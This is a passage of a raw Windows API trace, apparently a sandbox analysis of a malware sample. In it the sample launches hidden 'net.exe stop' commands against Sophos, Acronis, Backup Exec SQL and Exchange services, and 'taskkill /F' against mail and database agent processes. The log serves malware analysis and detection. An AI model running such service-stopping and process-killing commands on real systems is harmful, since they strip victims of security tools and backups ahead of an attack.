lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f248*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27b4e34 | out: lpCommandLine="\"net.exe\" stop “Sophos MCS Agent” /y", lpProcessInformation=0x27b4e34*(hProcess=0x560, hThread=0x444, dwProcessId=0xd08, dwThreadId=0x708)) returned 1 [0134.447] CloseHandle (hObject=0x448) returned 1 [0134.447] GetFileType (hFile=0x540) returned 0x3 [0134.447] CloseHandle (hObject=0x444) returned 1 [0134.447] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.447] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.448] GetCurrentProcess () returned 0xffffffff [0134.448] GetCurrentProcess () returned 0xffffffff [0134.448] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x550) returned 1 [0134.448] CloseHandle (hObject=0x444) returned 1 [0134.448] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.448] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.448] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.448] CoTaskMemFree (pv=0x741d20) [0134.448] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop AcrSch2Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27b86f0 | out: lpCommandLine="\"net.exe\" stop AcrSch2Svc /y", lpProcessInformation=0x27b86f0*(hProcess=0x598, hThread=0x444, dwProcessId=0x1080, dwThreadId=0x1070)) returned 1 [0134.452] CloseHandle (hObject=0x448) returned 1 [0134.452] GetFileType (hFile=0x550) returned 0x3 [0134.452] CloseHandle (hObject=0x444) returned 1 [0134.453] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.453] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.453] GetCurrentProcess () returned 0xffffffff [0134.453] GetCurrentProcess () returned 0xffffffff [0134.453] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x524) returned 1 [0134.453] CloseHandle (hObject=0x444) returned 1 [0134.453] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.453] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.453] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.453] CoTaskMemFree (pv=0x741d20) [0134.453] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSOLAP$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27bbfa0 | out: lpCommandLine="\"net.exe\" stop MSOLAP$TPSAMA /y", lpProcessInformation=0x27bbfa0*(hProcess=0x514, hThread=0x444, dwProcessId=0x4f8, dwThreadId=0x1040)) returned 1 [0134.458] CloseHandle (hObject=0x448) returned 1 [0134.458] GetFileType (hFile=0x524) returned 0x3 [0134.458] CloseHandle (hObject=0x444) returned 1 [0134.458] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.458] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.458] GetCurrentProcess () returned 0xffffffff [0134.458] GetCurrentProcess () returned 0xffffffff [0134.458] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x568) returned 1 [0134.458] CloseHandle (hObject=0x444) returned 1 [0134.458] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.458] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.458] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.458] CoTaskMemFree (pv=0x741d20) [0134.458] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “intel(r) proset monitoring service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f224*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27bf87c | out: lpCommandLine="\"net.exe\" stop “intel(r) proset monitoring service” /y", lpProcessInformation=0x27bf87c*(hProcess=0x500, hThread=0x444, dwProcessId=0x103c, dwThreadId=0xfc0)) returned 1 [0134.462] CloseHandle (hObject=0x448) returned 1 [0134.462] GetFileType (hFile=0x568) returned 0x3 [0134.462] CloseHandle (hObject=0x444) returned 1 [0134.463] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.463] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.463] GetCurrentProcess () returned 0xffffffff [0134.463] GetCurrentProcess () returned 0xffffffff [0134.463] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x47c) returned 1 [0134.463] CloseHandle (hObject=0x444) returned 1 [0134.463] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.463] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.463] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.463] CoTaskMemFree (pv=0x741d20) [0134.463] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop msexchangeimap4 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f24c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27c3160 | out: lpCommandLine="\"net.exe\" stop msexchangeimap4 /y", lpProcessInformation=0x27c3160*(hProcess=0x558, hThread=0x444, dwProcessId=0x10e8, dwThreadId=0xa38)) returned 1 [0134.468] CloseHandle (hObject=0x448) returned 1 [0134.468] GetFileType (hFile=0x47c) returned 0x3 [0134.468] CloseHandle (hObject=0x444) returned 1 [0134.468] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.468] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.468] GetCurrentProcess () returned 0xffffffff [0134.468] GetCurrentProcess () returned 0xffffffff [0134.468] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4c8) returned 1 [0134.468] CloseHandle (hObject=0x444) returned 1 [0134.468] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.468] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.468] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.468] CoTaskMemFree (pv=0x741d20) [0134.469] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos MCS Client” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f244*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27c6a20 | out: lpCommandLine="\"net.exe\" stop “Sophos MCS Client” /y", lpProcessInformation=0x27c6a20*(hProcess=0x4f8, hThread=0x444, dwProcessId=0xfb8, dwThreadId=0x10e4)) returned 1 [0135.475] CloseHandle (hObject=0x448) returned 1 [0135.483] GetFileType (hFile=0x4c8) returned 0x3 [0135.484] CloseHandle (hObject=0x444) returned 1 [0139.188] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.189] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x518, hWritePipe=0x5d8f304*=0x4f4) returned 1 [0139.189] GetCurrentProcess () returned 0xffffffff [0139.189] GetCurrentProcess () returned 0xffffffff [0139.189] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x588) returned 1 [0139.189] CloseHandle (hObject=0x518) returned 1 [0139.189] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.189] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.189] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.189] CoTaskMemFree (pv=0x741d20) [0139.189] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ARSM /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x2275abc | out: lpCommandLine="\"net.exe\" stop ARSM /y", lpProcessInformation=0x2275abc*(hProcess=0x590, hThread=0x518, dwProcessId=0x12f4, dwThreadId=0x1238)) returned 1 [0139.639] CloseHandle (hObject=0x4f4) returned 1 [0139.639] GetFileType (hFile=0x588) returned 0x3 [0139.639] CloseHandle (hObject=0x518) returned 1 [0139.878] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.878] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x518, hWritePipe=0x5d8f304*=0x4e0) returned 1 [0139.878] GetCurrentProcess () returned 0xffffffff [0139.878] GetCurrentProcess () returned 0xffffffff [0139.878] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x514) returned 1 [0139.878] CloseHandle (hObject=0x518) returned 1 [0139.879] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.879] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.879] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.879] CoTaskMemFree (pv=0x741d20) [0139.879] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$BKUPEXEC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x246d4b0 | out: lpCommandLine="\"net.exe\" stop MSSQL$BKUPEXEC /y", lpProcessInformation=0x246d4b0*(hProcess=0x598, hThread=0x518, dwProcessId=0xd54, dwThreadId=0x934)) returned 1 [0140.686] CloseHandle (hObject=0x4e0) returned 1 [0140.686] GetFileType (hFile=0x514) returned 0x3 [0140.686] CloseHandle (hObject=0x518) returned 1 [0142.177] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0142.178] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x5a0, hWritePipe=0x5d8f304*=0x50c) returned 1 [0142.178] GetCurrentProcess () returned 0xffffffff [0142.178] GetCurrentProcess () returned 0xffffffff [0142.178] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x518) returned 1 [0142.178] CloseHandle (hObject=0x5a0) returned 1 [0142.178] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0142.178] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0142.178] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0142.178] CoTaskMemFree (pv=0x741d20) [0142.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop unistoresvc_1af40a /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f248*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x50c, hStdError=0x0), lpProcessInformation=0x2275948 | out: lpCommandLine="\"net.exe\" stop unistoresvc_1af40a /y", lpProcessInformation=0x2275948*(hProcess=0x4f8, hThread=0x5a0, dwProcessId=0x108c, dwThreadId=0x1298)) returned 1 [0142.619] CloseHandle (hObject=0x50c) returned 1 [0142.619] GetFileType (hFile=0x518) returned 0x3 [0142.619] CloseHandle (hObject=0x5a0) returned 1 [0143.465] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0143.465] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x50c, hWritePipe=0x5d8f304*=0x4b0) returned 1 [0143.465] GetCurrentProcess () returned 0xffffffff [0143.465] GetCurrentProcess () returned 0xffffffff [0143.465] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4a4) returned 1 [0143.465] CloseHandle (hObject=0x50c) returned 1 [0143.465] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0143.465] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0143.465] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0143.466] CoTaskMemFree (pv=0x741d20) [0143.466] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Message Router” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f23c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x24745d0 | out: lpCommandLine="\"net.exe\" stop “Sophos Message Router” /y", lpProcessInformation=0x24745d0*(hProcess=0x5a0, hThread=0x50c, dwProcessId=0xc8c, dwThreadId=0x12cc)) returned 1 [0144.022] CloseHandle (hObject=0x4b0) returned 1 [0144.022] GetFileType (hFile=0x4a4) returned 0x3 [0144.022] CloseHandle (hObject=0x50c) returned 1 [0144.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.532] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.767] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.767] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.772] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.776] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.786] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.906] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.906] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x50c, hWritePipe=0x5d8f304*=0x4b0) returned 1 [0147.906] GetCurrentProcess () returned 0xffffffff [0147.906] GetCurrentProcess () returned 0xffffffff [0147.906] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4a0) returned 1 [0147.906] CloseHandle (hObject=0x50c) returned 1 [0147.906] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.906] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.906] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.906] CoTaskMemFree (pv=0x741d20) [0147.907] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM agntsvc.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f24c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x249d264 | out: lpCommandLine="\"taskkill.exe\" /IM agntsvc.exe /F", lpProcessInformation=0x249d264*(hProcess=0x4f4, hThread=0x50c, dwProcessId=0xe1c, dwThreadId=0xc78)) returned 1 [0147.923] CloseHandle (hObject=0x4b0) returned 1 [0147.923] GetFileType (hFile=0x4a0) returned 0x3 [0147.923] CloseHandle (hObject=0x50c) returned 1 [0149.540] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.540] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4b0, hWritePipe=0x5d8f304*=0x504) returned 1 [0149.540] GetCurrentProcess () returned 0xffffffff [0149.540] GetCurrentProcess () returned 0xffffffff [0149.540] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x560) returned 1 [0149.541] CloseHandle (hObject=0x4b0) returned 1 [0149.541] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.541] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.541] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.541] CoTaskMemFree (pv=0x741d20) [0149.541] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM thebat64.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f24c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x227610c | out: lpCommandLine="\"taskkill.exe\" /IM thebat64.exe /F", lpProcessInformation=0x227610c*(hProcess=0x4f4, hThread=0x4b0, dwProcessId=0x1074, dwThreadId=0x1064)) returned 1 [0149.546] CloseHandle (hObject=0x504) returned 1 [0149.546] GetFileType (hFile=0x560) returned 0x3 [0149.546] CloseHandle (hObject=0x4b0) returned 1 [0150.422] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.422] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x504, hWritePipe=0x5d8f304*=0x558) returned 1 [0150.422] GetCurrentProcess () returned 0xffffffff [0150.422] GetCurrentProcess () returned 0xffffffff [0150.422] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x574) returned 1 [0150.422] CloseHandle (hObject=0x504) returned 1 [0150.422] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.422] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.422] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.423] CoTaskMemFree 